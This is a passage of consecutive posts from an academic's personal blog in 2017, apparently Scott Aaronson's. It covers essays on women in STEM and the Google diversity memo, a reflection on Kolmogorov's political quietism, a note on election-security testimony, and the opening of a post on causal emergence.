I’ve had a women-in-STEM essay brewing in me for years, but I’ve been reluctant to actually write publicly on the topic for fear of stirring up a firestorm of controversy. On the other hand, we seem to be at a cultural inflection point on the issue, especially in the wake of the leaked Google memo, and other people are already scared to speak out, so I think it’s past time for me to put my name on the line, and Scott has graciously provided me a platform to do so.
I’m a woman in tech myself. I’m a data scientist doing machine learning for drug discovery at Recursion Pharmaceuticals, and before that I was a data scientist at Palantir. Before that I was a woman in math — I got my PhD from Yale, studying applied harmonic analysis. I’ve been in this world all my adult life, and I obviously don’t believe my gender makes me unfit to do the work.
I’m also not under any misapprehension that I’m some sort of exception. I’ve been mentored by Ingrid Daubechies and Maryam Mirzakhani (the first female Fields Medalist, who died tragically young last month). I’ve been lucky enough to work with women who are far, far better than me. There are a lot of remarkable women in math and computer science — women just aren’t the majority in those fields. But “not the majority” doesn’t mean “rare” or “unknown.”
I even think diversity programs can be worthwhile. I went to the Institute for Advanced Studies’ Women and Math Program, which would be an excellent graduate summer school even if it weren’t all-female, and taught at its sister program for high school girls, which likewise is a great math camp independent of the gender angle. There’s a certain magic, if you’re in a male-dominated field, of once in a while being in a room full of women doing math, and I hope that everybody gets to have that experience once.
But (you knew the “but” was coming), I think the Google memo was largely correct, and the way people conventionally talk about women in tech is wrong.
Let’s look at some of his claims. From the beginning of the memo:
• Google’s political bias has equated the freedom from offense with psychological safety, but shaming into silence is the antithesis of psychological safety.
• This silencing has created an ideological echo chamber where some ideas are too sacred to be honestly discussed.
• The lack of discussion fosters the most extreme and authoritarian elements of this ideology.
• Extreme: all disparities in representation are due to oppression
• Authoritarian: we should discriminate to correct for this oppression
Okay, so there’s a pervasive assumption that any deviation from 50% representation of women in technical jobs is a.) due to oppression, and b.) ought to be corrected by differential hiring practices. I think it is basically true that people widely believe this, and that people can lose their jobs for openly contradicting it (as James Damore, the author of the memo, did). I have heard people I work with advocating hiring quotas for women (i.e. explicitly earmarking a number of jobs for women candidates only). It’s not a strawman.
Then, Damore disagrees with this assumption:
• Differences in distributions of traits between men and women may in part explain why we don’t have 50% representation of women in tech and leadership. Discrimination to reach equal representation is unfair, divisive, and bad for business.
Again, I agree with Damore. Note that this doesn’t mean that I must believe that sexism against women isn’t real and important (I’ve heard enough horror stories to be confident that some work environments are toxic to women). It doesn’t even mean that I must be certain that the different rates of men and women in technical fields are due to genetics. I’m very far from certain, and I’m not an expert in psychology. I don’t think I can do justice to the science in this post, so I’m not going to cover the research literature.
But I do think it’s irresponsible to assume a priori that there are no innate sex differences that might explain what we see. It’s an empirical matter, and a topic for research, not dogma.
Moreover, I think discrimination on the basis of sex to reach equal representation is unfair and unproductive. It’s unfair, because it’s not meritocratic. You’re not choosing the best human for the job regardless of gender.
I think women might actually benefit from companies giving genuine meritocracy a chance. “Blind” auditions (in which the evaluator doesn’t see the performer) gave women a better chance of landing orchestra jobs; apparently, orchestras were prejudiced against female musicians, and the blinding canceled out that prejudice. Google’s own research has actually shown that the single best predictor of work performance is a work sample — testing candidates with a small project similar to what they’d do on the job. Work samples are easy to anonymize to reduce gender bias, and they’re more effective than traditional interviews, where split-second first impressions usually decide who gets hired, but don’t correlate at all with job performance. A number of tech companies have switched to work samples as part of their interview process. I used work samples myself when I was hiring for a startup, just because they seemed more accurate at predicting who’d be good at the job; entirely without intending to, I got a 50% gender ratio. If you want to reduce gender bias in tech, it’s worth at least considering blinded hiring via work samples.
Moreover, thinking about “representation” in science and technology reflects underlying assumptions that I think are quite dangerous.
You expect interest groups to squabble over who gets a piece of the federal budget. In politics, people will band together in blocs, and try to get the biggest piece of the spoils they can. “Women should get such-and-such a percent of tech jobs” sounds precisely like this kind of politicking; women are assumed to be a unified bloc who will vote together, and the focus is on what size chunk they can negotiate for themselves. If a tech job (or a university position) were a cushy sinecure, a ticket to privilege, and nothing more, you might reasonably ask “how come some people get more goodies than others? Isn’t meritocracy just an excuse to restrict the goodies to your preferred group?”
Again, this is not a strawman. Here’s one Vox response to the memo stating explicitly that she believes women are a unified bloc:
The manifesto’s sleight-of-hand delineation between “women, on average” and the actual living, breathing women who have had to work alongside this guy failed to reassure many of those women — and failed to reassure me. That’s because the manifesto’s author overestimated the extent to which women are willing to be turned against their own gender.
Speaking for myself, it doesn’t matter to me how soothingly a man coos that I’m not like most women, when those coos are accompanied by misogyny against most women. I am a woman. I do not stop being one during the parts of the day when I am practicing my craft. There can be no realistic chance of individual comfort for me in an environment where others in my demographic categories (or, really, any protected demographic categories) are subjected to skepticism and condescension.
She can’t be comfortable unless everybody in any protected demographic category — note that this is a legal, governmental category — is given the benefit of the doubt? That’s a pretty collectivist commitment!
Or, look at Piper Harron, an assistant professor in math who blogged on the American Mathematical Society’s website that universities should simply “stop hiring white cis men”, and explicitly says “If you are on a hiring committee, and you are looking at applicants and you see a stellar white male applicant, think long and hard about whether your department needs another white man. You are not hiring a researching robot who will output papers from a dark closet. You are hiring an educator, a role model, a spokesperson, an advisor, a committee person … There is no objectivity. There is no meritocracy.”
Piper Harron reflects an extreme, of course, but she’s explicitly saying, on America’s major communication channel for and by mathematicians, that whether you get to work in math should not be based on whether you’re actually good at math. For her, it’s all politics. Life itself is political, and therefore a zero-sum power struggle between groups.
But most of us, male or female, didn’t fall in love with science and technology for that. Science is the mission to explore and understand our universe. Technology is the project of expanding human power to shape that universe. What we do towards those goals will live longer than any “protected demographic category”, any nation, any civilization. We know how the Babylonians mapped the stars.
Women deserve an equal chance at a berth on the journey of exploration not because they form a political bloc but because some of them are discoverers and can contribute to the human mission.
Maybe, in a world corrupted by rent-seeking, the majority of well-paying jobs have some element of unearned privilege; perhaps almost all of us got at least part of our salaries by indirectly expropriating someone who had as good a right to it as us.
But that’s not a good thing, and that’s not what we hope for science and engineering to be, and I truly believe that this is not the inevitable fate of the human race — that we can only squabble over scraps, and never create.
I’ve seen creation, and I’ve seen discovery. I know they’re real.
I care a lot more about whether my company achieves its goal of curing 100 rare diseases in 10 years than about the demographic makeup of our team. We have an actual mission; we are trying to do something beyond collecting spoils.
Do I rely on brilliant work by other women every day? I do. My respect for myself and my female colleagues is not incompatible with primarily caring about the mission.
Am I “turning against my own gender” because I see women as individuals first? I don’t think so. We’re half the human race, for Pete’s sake! We’re diverse. We disagree. We’re human.
When you think of “women-in-STEM” as a talking point on a political agenda, you mention Ada Lovelace and Grace Hopper in passing, and move on to talking about quotas. When you think of women as individuals, you start to notice how many genuinely foundational advances were made by women — just in my own field of machine learning, Adele Cutler co-invented random forests, Corrina Cortes co-invented support vector machines, and Fei Fei Li created the famous ImageNet benchmark dataset that started a revolution in image recognition.
As a child, my favorite book was Carl Sagan’s Contact, a novel about Ellie Arroway, an astronomer loosely based on his wife Ann Druyan. The name is not an accident; like the title character in Sinclair Lewis’ Arrowsmith, Ellie is a truth-seeking scientist who battles corruption, anti-intellectualism, and blind prejudice. Sexism is one of the challenges she faces, but the essence of her life is about wonder and curiosity. She’s what I’ve always tried to become.
I hope that, in seeking to encourage the world’s Ellies in science and technology, we remember why we’re doing that in the first place. I hope we remember humans are explorers.
Now let’s hear from another friend who wrote to me recently, and who has a slightly different take. Stacey Jeffery is a quantum computing theorist at one of my favorite research centers, CWI in Amsterdam. She completed her PhD at University of Waterloo, and has done wonderful work on quantum query complexity and other topics close to my heart. When I was being viciously attacked in the comment-171 affair, Stacey was one of the first people to send me a note of support, and I’ve never forgotten it.
Stacey Jeffery’s Commentary
I don’t think Google was right to fire Damore. This makes me a minority among people with whom I have discussed this issue. Hopefully some people come out in the comments in support of the other position, so it’s not just me presenting that view, but the main argument I encountered was that what he said just sounded way too sexist for Google to put up with. I agree with part of that, it did sound sexist to me. In fact it also sounded racist to me. But that’s not because he necessarily said anything actually sexist or actually racist, but because he said the kinds of things that you usually only hear from sexist people, and in particular, the kind of sexist people who are also racist. I’m very unlikely to try to pursue further interaction with a person who says these kinds of things for those reasons, but I think firing him for what he said between the lines sets a very bad precedent. It seems to me he was fired for associating himself with the wrong ideas, and it does feel a bit like certain subjects are not up for rational discussion. If Google wants an open environment, where employees can feel safe discussing company policy, I don’t think this contributes to that. If they want their employees, and the world, to think that they aim for diversity because it’s the most rational course of action to achieve their overall objectives, rather than because it serves some secret agenda, like maintaining a PC public image, then I don’t think they’ve served that cause either. Personally, this irritates me the most, because I feel they have damaged the image for a cause I feel strongly about.
My position is independent of the validity of Damore’s attempt at scientific argument, which is outside my area of expertise. I personally don’t think it’s very productive for non-social-scientists to take authoritative positions on social science issues, especially ones that appear to be controversial within the field (but I say this as a layperson). This may include some of the other commentary in this blog post, which I have not yet read, and might even extend to Scott’s decision to comment on this issue at all (but this bridge was crossed in the previous blog post). However, I think one of the reasons that many of us do this is that the burden of solving the problem of too few women in STEM is often placed on us. Some people in STEM feel they are blamed for not being welcoming enough to women (in fact, in my specific field, it’s my experience that the majority of people are very sympathetic). Many scientific funding applications even ask applicants how they plan to address the issue of diversity, as if they should be the ones to come up with a solution for this difficult problem that nobody knows the answer to, and is not even within their expertise. So it’s not surprising when these same people start to think about and form opinions on these social science issues. Obviously, we working in STEM have valuable insight into how we might encourage women to pursue STEM careers, and we should be pushed to think about this, but we don’t have all the answers (and maybe we should remember that the next time we consider authoring an authoritative memo on the subject).
Scott’s Mansplaining Commentary
I’m incredibly grateful to Sarah and Stacey for sharing their views. Now it’s time for me to mansplain my own thoughts in light of what they said. Let me start with a seven-point creed.
1. I believe that science and engineering, both in academia and in industry, benefit enormously from contributions from people of every ethnic background and gender identity. This sort of university-president-style banality shouldn’t even need to be said, but in a world where the President of the US criticizes neo-Nazis only under extreme pressure from his own party, I suppose it does.
2. I believe that there’s no noticeable difference in average ability between men and women in STEM fields—or if there’s some small disparity, for all I know the advantage goes to women. I have enough Sheldon Cooper in me that, if this hadn’t been my experience, I’d probably let it slip that it hadn’t been, but it has been. When I taught 6.045 (undergrad computability and complexity) at MIT, women were only 20% or so of the students, but for whatever reasons they were wildly overrepresented among the top students.
3. I believe that women in STEM face obstacles that men don’t. These range from the sheer awkwardness of sometimes being the only woman in a room full of guys, to challenges related to pregnancy and childcare, to actual belittlement and harassment. Note that, even if men in STEM fields are no more sexist on average than men in other fields—or are less sexist, as one might expect from their generally socially liberal views and attitudes—the mere fact of the gender imbalance means that women in STEM will have many more opportunities to be exposed to whatever sexists there are. This puts a special burden on us to create a welcoming environment for women.
4. Given that we know that gender gaps in interest and inclination appear early in life, I believe in doing anything we can to encourage girls’ interest in STEM fields. Trust me, my four-year-old daughter Lily wishes I didn’t believe so fervently in working with her every day on her math skills.
5. I believe that gender diversity is valuable in itself. It’s just nicer, for men and women alike, to have a work environment with many people of both sexes—especially if (as is often the case in STEM) so much of our lives revolves around our work. I think that affirmative action for women, women-only scholarships and conferences, and other current efforts to improve gender diversity can all be defended and supported on that ground alone.
6. I believe that John Stuart Mill’s The Subjection of Women is one of the masterpieces of history, possibly the highest pinnacle that moral philosophy has ever reached. Everyone should read it carefully and reflect on it if they haven’t already.
7. I believe it’s a tragedy that the current holder of the US presidency is a confessed sexual predator, who’s full of contempt not merely for feminism, but for essentially every worthwhile human value. I believe those of us on the “pro-Enlightenment side” now face the historic burden of banding together to stop this thug by every legal and peaceful means available. I believe that, whenever the “good guys” tear each other down in internecine warfare—e.g. “nerds vs. feminists”—it represents a wasted opportunity and an unearned victory for the enemies of progress.
OK, now for the part that might blow some people’s minds. I hold that every single belief above is compatible with what James Damore wrote in his now-infamous memo—at least, if we’re talking about the actual words in it. In some cases, Damore even makes the above points himself. In particular, there’s nothing in what he wrote about female Googlers being less qualified on average than male Googlers, or being too neurotic to code, or anything like that: the question at hand is just why there are fewer women in these positions, and that in turn becomes a question about why there are fewer women earlier in the CS pipeline. Reasonable people need not agree about the answers to those questions, or regard them as known or obvious, to see that the failure to make this one elementary distinction, between quality and quantity, already condemns 95% of Damore’s attackers as not having read or understood what he wrote.
Let that be the measure of just how terrifyingly efficient the social-media outrage machine has become at twisting its victims’ words to fit a clickbait narrative—a phenomenon with which I happen to be personally acquainted. Strikingly, it seems not to make the slightest difference if (as in this case) the original source text is easily available to everyone.
Still, while most coverage of Damore’s memo was depressing in its monotonous incomprehension, dissent was by no means confined to the right-wingers eager to recruit Damore to their side. Peter Singer—the legendary leftist moral philosopher, and someone whose fearlessness and consistency I’ve always admired whether I’ve agreed with him or not—wrote a powerful condemnation of Google’s decision to fire Damore. Scott Alexander was brilliant as usual in picking apart bad arguments. Megan McArdle drew on her experiences to illustrate some of Damore’s contentions. Steven Pinker tweeted that Damore’s firing “makes [the] job of anti-Trumpists harder.”
Like Peter Singer, and also like Sarah Constantin and Stacey Jeffery above, I have no plans to take any position on biological differences in male and female inclinations and cognitive styles, and what role (if any) such differences might play in 80% of Google engineers being male—or, for that matter, what role they might play in 80% of graduating veterinarians now being female, or other striking gender gaps. I decline to take a position not only because I’m not an expert, but also because, as Singer says, doing so isn’t necessary to reach the right verdict about Damore’s firing. It suffices to note that the basic thesis being discussed—namely, that natural selection doesn’t stop at the neck, and that it’s perfectly plausible that it acted differently on women and men in ways that might help explain many of the population-level differences that we see today—can also be found in, for example, The Blank Slate by Steven Pinker, and other mainstream works by some of the greatest thinkers alive.
And therefore I say: if James Damore deserves to be fired from Google, for treating evolutionary psychology as potentially relevant to social issues, then Steven Pinker deserves to be fired from Harvard for the same offense.
Yes, I realize that an employee of a private company is different from a tenured professor. But I don’t see why it’s relevant here. For if someone really believes that mooting the hypothesis of an evolutionary reason for average differences in cognitive styles between men and women, is enough by itself to create a hostile environment for women—well then, why should tenure be a bar to firing, any more than it is in cases of sexual harassment?
But the reductio needn’t stop there. It seems to me that, if Damore deserves to be fired, then so do the 56% of Googlers who said in a poll that they opposed his firing. For isn’t that 56% just as responsible for maintaining a hostile environment as Damore himself was? (And how would Google find out which employees opposed the firing? Well, if there’s any company on earth that could…) Furthermore, after those 56% of Googlers are fired, any of the remaining 44% who think the 56% shouldn’t have been fired should be fired as well! And so on iteratively, until only an ideologically reliable core remains, which might or might not be the empty set.
OK, but while the wider implications of Damore’s firing have frightened and depressed me all week, as I said, I depart from Damore on the question of affirmative action and other diversity policies. Fundamentally, what I want is a sort of negotiated agreement or bargain, between STEM nerds and the wider culture in which they live. The agreement would work like this: STEM nerds do everything they can to foster diversity, including by creating environments that are welcoming for women, and by supporting affirmative action, women-only scholarships and conferences, and other diversity policies. The STEM nerds also agree never to talk in public about possible cognitive-science explanations for gender disparities in which careers people choose, or overlapping bell curves, or anything else potentially inflammatory. In return, just two things:
1. Male STEM nerds don’t regularly get libelled as misogynist monsters, who must be scaring all the women away with their inherently gross, icky, creepy, discriminatory brogrammer maleness.
2. The fields beloved by STEM nerds are suffered to continue to exist, rather than getting destroyed and rebuilt along explicitly ideological lines, as already happened with many humanities and social science fields.
So in summary, neither side advances its theories about the causes of gender gaps; both sides simply agree that there are more interesting topics to explore. In concrete terms, the social-justice side gets to retain 100% of what it has now, or maybe even expand it. And all it has to offer in exchange is “R-E-S-P-E-C-T“! Like, don’t smear and shame male nerds as a class, or nerdy disciplines themselves, for gender gaps that the male nerds would be as happy as anybody to see eradicated.
The trouble is that, fueled by outrage-fests on social media, I think the social-justice side is currently failing to uphold its end of this imagined bargain. Nearly every day the sun rises to yet another thinkpiece about the toxic “bro culture” of Silicon Valley: a culture so uniquely and incorrigibly misogynist, it seems, that it still intentionally keeps women out, even after law and biology and most other white-collar fields have achieved or exceeded gender parity, their own “bro cultures” notwithstanding. The trouble with this slander against male STEM nerds, besides its fundamental falsity (which Scott Alexander documented), is that puts the male nerds into an impossible position. For how can they refute the slander without talking about other possible explanations for fields like CS being 80% male, which is the very thing we all know they’re not supposed to talk about?
In Europe, in the Middle Ages, the Church would sometimes enjoy forcing the local Jews into “disputations” about whose religion was the true one. At these events, a popular tactic on the Church’s side was to make statements that the Jews couldn’t possibly answer without blaspheming the name of Christ—which, of course, could lead to the Jews’ expulsion or execution if they dared it.
Maybe I have weird moral intuitions, but it’s hard for me to imagine a more contemptible act of intellectual treason, than deliberately trapping your opponents between surrender and blasphemy. I’d actually rather have someone force me into one or the other, than make me choose, and thereby make me responsible for whichever choice I made. So I believe the social-justice left would do well to forswear this trapping tactic forever.
Ironically, I suspect that in the long term, doing so would benefit no entity more than the social-justice left itself. If I had to steelman, in one sentence, the argument that in the space of one year propelled the “alt-right” from obscurity in dark and hateful corners of the Internet, to the improbable and ghastly ascent of Donald Trump and his white-nationalist brigade to the most powerful office on earth, the argument would be this:
If the elites, the technocrats, the “Cathedral”-dwellers, were willing to lie to the masses about humans being blank slates—and they obviously were—then why shouldn’t we assume that they also lied to us about healthcare and free trade and guns and climate change and everything else?
We progressives deluded ourselves that we could permanently shame our enemies into silence, on pain of sexism, racism, xenophobia, and other blasphemies. But the “victories” won that way were hollow and illusory, and the crumbling of the illusion brings us to where we are now: with a vindictive, delusional madman in the White House who has a non-negligible chance of starting a nuclear war this week.
The Enlightenment was a specific historical period in 18th-century Europe. But the term can also be used much more broadly, to refer to every trend in human history that’s other than horrible. Seen that way, the Enlightenment encompasses the scientific revolution, the abolition of slavery, the decline of all forms of violence, the spread of democracy and literacy, and the liberation of women from domestic drudgery to careers of their own choosing. The invention of Google, which made the entire world’s knowledge just a search bar away, is now also a permanent part of the story of the Enlightenment.
I fantasize that, within my lifetime, the Enlightenment will expand further to tolerate a diversity of cognitive styles—including people on the Asperger’s and autism spectrum, with their penchant for speaking uncomfortable truths—as well as a diversity of natural abilities and inclinations. Society might or might not get the “demographically correct” percentage of Ellie Arroways—Ellie might decide to become a doctor or musician rather than an astronomer, and that’s fine too—but most important, it will nurture all the Ellie Arroways that it gets, all the misfits and explorers of every background. I wonder whether, while disagreeing on exactly what’s meant by it, all parties to this debate could agree that diversity represents a next frontier for the Enlightenment.
Comment Policy: Any comment, from any side, that attacks people rather than propositions will be deleted. I don’t care if the comment also makes useful points: if it contains a single ad hominem, it’s out.
As it happens, I’m at a quantum supremacy workshop in Bristol, UK right now—yeah, yeah, I’m a closet supremacist after all, hur hur—so I probably won’t participate in the comments until later.
### The Kolmogorov option
Tuesday, August 8th, 2017
Andrey Nikolaevich Kolmogorov was one of the giants of 20th-century mathematics. I’ve always found it amazing that the same man was responsible both for establishing the foundations of classical probability theory in the 1930s, and also for co-inventing the theory of algorithmic randomness (a.k.a. Kolmogorov complexity) in the 1960s, which challenged the classical foundations, by holding that it is possible after all to talk about the entropy of an individual object, without reference to any ensemble from which the object was drawn. Incredibly, going strong into his eighties, Kolmogorov then pioneered the study of “sophistication,” which amends Kolmogorov complexity to assign low values both to “simple” objects and “random” ones, and high values only to a third category of objects, which are “neither simple nor random.” So, Kolmogorov was at the vanguard of the revolution, counter-revolution, and counter-counter-revolution.
But that doesn’t even scratch the surface of his accomplishments: he made fundamental contributions to topology and dynamical systems, and together with Vladimir Arnold, solved Hilbert’s thirteenth problem, showing that any multivariate continuous function can be written as a composition of continuous functions of two variables. He mentored an awe-inspiring list of young mathematicians, whose names (besides Arnold) include Dobrushin, Dynkin, Gelfand, Martin-Löf, Sinai, and in theoretical computer science, our own Leonid Levin. If that wasn’t enough, during World War II Kolmogorov applied his mathematical gifts to artillery problems, helping to protect Moscow from German bombardment.
Kolmogorov was private in his personal and political life, which might have had something to do with being gay, at a time and place when that was in no way widely accepted. From what I’ve read—for example, in Gessen’s biography of Perelman—Kolmogorov seems to have been generally a model of integrity and decency. He established schools for mathematically gifted children, which became jewels of the Soviet Union; one still reads about them with awe. And at a time when Soviet mathematics was convulsed by antisemitism—with students of Jewish descent excluded from the top math programs for made-up reasons, sent instead to remote trade schools—Kolmogorov quietly protected Jewish researchers.
OK, but all this leaves a question. Kolmogorov was a leading and admired Soviet scientist all through the era of Stalin’s purges, the Gulag, the KGB, the murders and disappearances and forced confessions, the show trials, the rewritings of history, the allies suddenly denounced as traitors, the tragicomedy of Lysenkoism. Anyone as intelligent, individualistic, and morally sensitive as Kolmogorov would obviously have seen through the lies of his government, and been horrified by its brutality. So then why did he utter nary a word in public against what was happening?
As far as I can tell, the answer is simply: because Kolmogorov knew better than to pick fights he couldn’t win. He judged that he could best serve the cause of truth by building up an enclosed little bubble of truth, and protecting that bubble from interference by the Soviet system, and even making the bubble useful to the system wherever he could—rather than futilely struggling to reform the system, and simply making martyrs of himself and all his students for his trouble.
There’s a saying of Kolmogorov, which associates wisdom with keeping your mouth shut:
“Every mathematician believes that he is ahead of the others. The reason none state this belief in public is because they are intelligent people.”
There’s also a story that Kolmogorov loved to tell about himself, which presents math as a sort of refuge from the arbitrariness of the world: he said that he once studied to become a historian, but was put off by the fact that historians demanded ten different proofs for the same proposition, whereas in math, a single proof suffices.
There was also a dark side to political quietism. In 1936, Kolmogorov joined other mathematicians in testifying against his former mentor in the so-called Luzin affair. By many accounts, he did this because the police blackmailed him, by threatening to reveal his homosexual relationship with Pavel Aleksandrov. On the other hand, while he was never foolish enough to take on Lysenko directly, Kolmogorov did publish a paper in 1940 courageously supporting Mendelian genetics.
It seems likely that in every culture, there have been truths, which moreover everyone knows to be true on some level, but which are so corrosive to the culture’s moral self-conception that one can’t assert them, or even entertain them seriously, without (in the best case) being ostracized for the rest of one’s life. In the USSR, those truths were the ones that undermined the entire communist project: for example, that humans are not blank slates; that Mendelian genetics is right; that Soviet collectivized agriculture was a humanitarian disaster. In our own culture, those truths are—well, you didn’t expect me to say, did you? 🙂
I’ve long been fascinated by the psychology of unspeakable truths. Like, for any halfway perceptive person in the USSR, there must have been an incredible temptation to make a name for yourself as a daring truth-teller: so much low-hanging fruit! So much to say that’s correct and important, and that best of all, hardly anyone else is saying!
But then one would think better of it. It’s not as if, when you speak a forbidden truth, your colleagues and superiors will thank you for correcting their misconceptions. Indeed, it’s not as if they didn’t already know, on some level, whatever you imagined yourself telling them. In fact it’s often because they fear you might be right that the authorities see no choice but to make an example of you, lest the heresy spread more widely. One corollary is that the more reasonably and cogently you make your case, the more you force the authorities’ hand.
But what’s the inner psychology of the authorities? For some, it probably really is as cynical as the preceding paragraph makes it sound. But for most, I doubt that. I think that most authorities simply internalize the ruling ideology so deeply that they equate dissent with sin. So in particular, the better you can ground your case in empirical facts, the craftier and more conniving a deceiver you become in their eyes, and hence the more virtuous they are for punishing you. Someone who’s arrived at that point is completely insulated from argument: absent some crisis that makes them reevaluate their entire life, there’s no sense in even trying. The question of whether or not your arguments have merit won’t even get entered upon, nor will the authority ever be able to repeat back your arguments in a form you’d recognize—for even repeating the arguments correctly could invite accusations of secretly agreeing with them. Instead, the sole subject of interest will be you: who you think you are, what your motivations were to utter something so divisive and hateful. And you have as good a chance of convincing authorities of your benign motivations as you’d have of convincing the Inquisition that, sure, you’re a heretic, but the good kind of heretic, the kind who rejects the divinity of Jesus but believes in niceness and tolerance and helping people. To an Inquisitor, “good heretic” doesn’t parse any better than “round square,” and the very utterance of such a phrase is an invitation to mockery. If the Inquisition had had Twitter, its favorite sentence would be “I can’t even.”
If it means anything to be a lover of truth, it means that anytime society finds itself stuck in one of these naked-emperor equilibriums—i.e., an equilibrium with certain facts known to nearly everyone, but severe punishments for anyone who tries to make those facts common knowledge—you hope that eventually society climbs its way out. But crucially, you can hope this while also realizing that, if you tried singlehandedly to change the equilibrium, it wouldn’t achieve anything good for the cause of truth. If iconoclasts simply throw themselves against a ruling ideology one by one, they can be picked off as easily as tribesmen charging a tank with spears, and each kill will only embolden the tank-gunners still further. The charging tribesmen don’t even have the assurance that, if truth ultimately does prevail, then they’ll be honored as martyrs: they might instead end up like Ted Nelson babbling about hypertext in 1960, or H.C. Pocklington yammering about polynomial-time algorithms in 1917, nearly forgotten by history for being too far ahead of their time.
Does this mean that, like Winston Smith, the iconoclast simply must accept that 2+2=5, and that a boot will stamp on a human face forever? No, not at all. Instead the iconoclast can choose what I think of as the Kolmogorov option. This is where you build up fortresses of truth in places the ideological authorities don’t particularly understand or care about, like pure math, or butterfly taxonomy, or irregular verbs. You avoid a direct assault on any beliefs your culture considers necessary for it to operate. You even seek out common ground with the local enforcers of orthodoxy. Best of all is a shared enemy, and a way your knowledge and skills might be useful against that enemy. For Kolmogorov, the shared enemy was the Nazis; for someone today, an excellent choice might be Trump, who’s rightly despised by many intellectual factions that spend most of their time despising each other. Meanwhile, you wait for a moment when, because of social tectonic shifts beyond your control, the ruling ideology has become fragile enough that truth-tellers acting in concert really can bring it down. You accept that this moment of reckoning might never arrive, or not in your lifetime. But even if so, you could still be honored by future generations for building your local pocket of truth, and for not giving falsehood any more aid or comfort than was necessary for your survival.
When it comes to the amount of flak one takes for defending controversial views in public under one’s own name, I defer to almost no one. For anyone tempted, based on this post, to call me a conformist or coward: how many times have you been denounced online, and from how many different corners of the ideological spectrum? How many people have demanded your firing? How many death threats have you received? How many threatened lawsuits? How many comments that simply say “kill yourself kike” or similar? Answer and we can talk about cowardice.
But, yes, there are places even I won’t go, hills I won’t die on. Broadly speaking:
• My Law is that, as a scientist, I’ll hold discovering and disseminating the truth to be a central duty of my life, one that overrides almost every other value. I’ll constantly urge myself to share what I see as the truth, even if it’s wildly unpopular, or makes me look weird, or is otherwise damaging to me.
• The Amendment to the Law is that I’ll go to great lengths not to hurt anyone else’s feelings: for example, by propagating negative stereotypes, or by saying anything that might discourage any enthusiastic person from entering science. And if I don’t understand what is or isn’t hurtful, then I’ll defer to the leading intellectuals in my culture to tell me. This Amendment often overrides the Law, causing me to bite my tongue.
• The Amendment to the Amendment is that, when pushed, I’ll stand by what I care about—such as free scientific inquiry, liberal Enlightenment norms, humor, clarity, and the survival of the planet and of family and friends and colleagues and nerdy misfits wherever they might be found. So if someone puts me in a situation where there’s no way to protect what I care about without speaking a truth that hurts someone’s feelings, then I might speak the truth, feelings be damned. (Even then, though, I’ll try to minimize collateral damage.)
When I see social media ablaze with this or that popular falsehood, I sometimes feel the “Galileo urge” washing over me. I think: I’m a tenured professor with a semi-popular blog. How can I look myself in the mirror, if I won’t use my platform and relative job safety to declare to the world, “and yet it moves”?
But then I remember that even Galileo weighed his options and tried hard to be prudent. In his mind, the Dialogue Concerning the Two Chief World Systems actually represented a compromise (!). Galileo never declared outright that the earth orbits the sun. Instead, he put the Copernican doctrine, as a “possible view,” into the mouth of his character Salviati—only to have Simplicio “refute” Salviati, by the final dialogue, with the argument that faith always trumps reason, and that human beings are pathetically unequipped to deduce the plan of God from mere surface appearances. Then, when that fig-leaf turned out not to be wide enough to fool the Church, Galileo quickly capitulated. He repented of his error, and agreed never to defend the Copernican heresy again. And he didn’t, at least not publicly.
Some have called Galileo a coward for that. But the great David Hilbert held a different view. Hilbert said that science, unlike religion, has no need for martyrs, because it’s based on facts that can’t be denied indefinitely. Given that, Hilbert considered Galileo’s response to be precisely correct: in effect Galileo told the Inquisitors, hey, you’re the ones with the torture rack. Just tell me which way you want it. I can have the earth orbiting Mars and Venus in figure-eights by tomorrow if you decree it so.
Three hundred years later, Andrey Kolmogorov would say to the Soviet authorities, in so many words: hey, you’re the ones with the Gulag and secret police. Consider me at your service. I’ll even help you stop Hitler’s ideology from taking over the world—you’re 100% right about that one, I’ll give you that. Now as for your own wondrous ideology: just tell me the dogma of the week, and I’ll try to make sure Soviet mathematics presents no threat to it.
There’s a quiet dignity to Kolmogorov’s (and Galileo’s) approach: a dignity that I suspect will be alien to many, but recognizable to those in the business of science.
Comment Policy: I welcome discussion about the responses of Galileo, Kolmogorov, and other historical figures to official ideologies that they didn’t believe in; and about the meta-question of how a truth-valuing person ought to behave when living under such ideologies. In the hopes of maintaining a civil discussion, any comments that mention current hot-button ideological disputes will be ruthlessly deleted.
### Alex Halderman testifying before the Senate Intelligence Committee
Wednesday, June 21st, 2017
This morning, my childhood best friend Alex Halderman testified before the US Senate about the proven ease of hacking electronic voting machines without leaving any record, the certainty that Russia has the technical capability to hack American elections, and the urgency of three commonsense (and cheap) countermeasures:
1. a paper trail for every vote cast in every state,
2. routine statistical sampling of the paper trail—enough to determine whether large-scale tampering occurred, and
3. cybersecurity audits to instill general best practices (such as firewalling election systems).
You can watch Alex on C-SPAN here—his testimony begins at 2:16:13, and is followed by the Q&A period. You can also read Alex’s prepared testimony here, as well as his accompanying Washington Post editorial (joint with Justin Talbot-Zorn).
Alex’s testimony—its civic, nonpartisan nature, right down to Alex’s flourish of approvingly quoting President Trump in support of paper ballots—reflects a moving optimism that, even in these dark times for democracy, Congress can be prodded into doing the right thing merely because it’s clearly, overwhelmingly in the national interest. I wish I could say I shared that optimism. Nevertheless, when called to testify, what can one do but act on the assumption that such optimism is justified? Here’s hoping that Alex’s urgent message is heard and acted on.
### Higher-level causation exists (but I wish it didn’t)
Sunday, June 4th, 2017
Unrelated Update (June 6): It looks like the issues we’ve had with commenting have finally been fixed! Thanks so much to Christie Wright and others at WordPress Concierge Services for handling this. Let me know if you still have problems. In the meantime, I also stopped asking for commenters’ email addresses (many commenters filled that field with nonsense anyway). Oops, that ended up being a terrible idea, because it made commenting impossible! Back to how it was before.
Update (June 5): Erik Hoel was kind enough to write a 5-page response to this post (Word .docx format), and to give me permission to share it here. I might respond to various parts of it later. For now, though, I’ll simply say that I stand by what I wrote, and that requiring the macro-distribution to arise by marginalizing the micro-distribution still seems like the correct choice to me (and is what’s assumed in, e.g., the proof of the data processing inequality). But I invite readers to read my post along with Erik’s response, form their own opinions, and share them in the comments section.
This past Thursday, Natalie Wolchover—a math/science writer whose work has typically been outstanding—published a piece in Quanta magazine entitled “A Theory of Reality as More Than the Sum of Its Parts.” The piece deals with recent work by Erik Hoel and his collaborators, including Giulio Tononi (Hoel’s adviser, and the founder of integrated information theory, previously critiqued on this blog). Commenter Jim Cross asked me to expand on my thoughts about causal emergence in a blog post, so: your post, monsieur.
